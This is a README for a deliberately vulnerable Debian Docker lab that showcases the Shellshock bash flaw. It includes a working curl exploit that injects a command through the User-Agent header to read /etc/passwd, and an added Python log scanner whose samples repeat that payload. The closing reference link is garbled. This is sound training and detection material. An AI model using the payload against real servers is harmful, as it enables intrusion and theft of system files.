Vulnerability as a service: showcasing CVE-2014-6271, a.k.a. Shellshock

Vulnerability as a Service - CVE 2014-6271

A Debian (Wheezy) Linux system with a vulnerable version of bash and a web application to showcase CVE-2014-6271, a.k.a. Shellshock.


This Docker container is based on Debian Wheezy and has been modified to use a vulnerable version of Bash (bash_4.2+dfsg-0.1).

A web application is available via Apache 2 and serves a CGI script which runs shell commands.


Install the container with: docker pull hmlio/vaas-cve-2014-6271

Run the container with a port mapping: docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271

You should be able to access the web application at http://your-ip:8080/.


The web application/vulnerable bash version can be exploited as shown below:

# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats
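Apache passes request headers to CGI scripts as environment variables, so a request like the one above leaves the function-definition prefix in the access log. The following detection sketch is an added example, not part of this repository: it assumes Apache's "combined" log format, and the function name and sample log lines are constructed for illustration.

```python
import re

# Apache "combined" LogFormat:
# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Prefix that bash treats as an exported function definition. Matched loosely
# (any whitespace, anywhere in the field) so spacing variants are caught too.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')

def find_shellshock_probes(lines):
    """Return one dict per log line whose request, Referer or User-Agent
    contains a bash function-definition prefix."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not in combined format, skip
        fields = [f for f in ("request", "referer", "agent")
                  if FUNC_DEF.search(m.group(f))]
        if fields:
            hits.append({"line": lineno, "host": m.group("host"),
                         "request": m.group("request"),
                         "status": int(m.group("status")), "fields": fields})
    return hits

# Constructed sample log using documentation IP ranges. Line 2 carries the
# User-Agent from the curl command above; line 3 is a spacing variant in Referer.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Jul/2015:10:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [12/Jul/2015:10:00:05 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 1021 "-" "() { :; }; echo; echo; /bin/bash -c \'cat /etc/passwd;\'"',
    '203.0.113.9 - - [12/Jul/2015:10:00:09 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 845 "(){ :;}; echo" "curl/7.38.0"',
    '198.51.100.7 - - [12/Jul/2015:10:00:12 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 845 "-" "curl/7.38.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(hit)
```

The combined format records only the request line, Referer and User-Agent, so a prefix carried in any other header will not show up in this log.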



The concept and the web application are heavily inspired by the VulnHub VM "Sokar", created by rasta_mouse. For further details please see,113/.
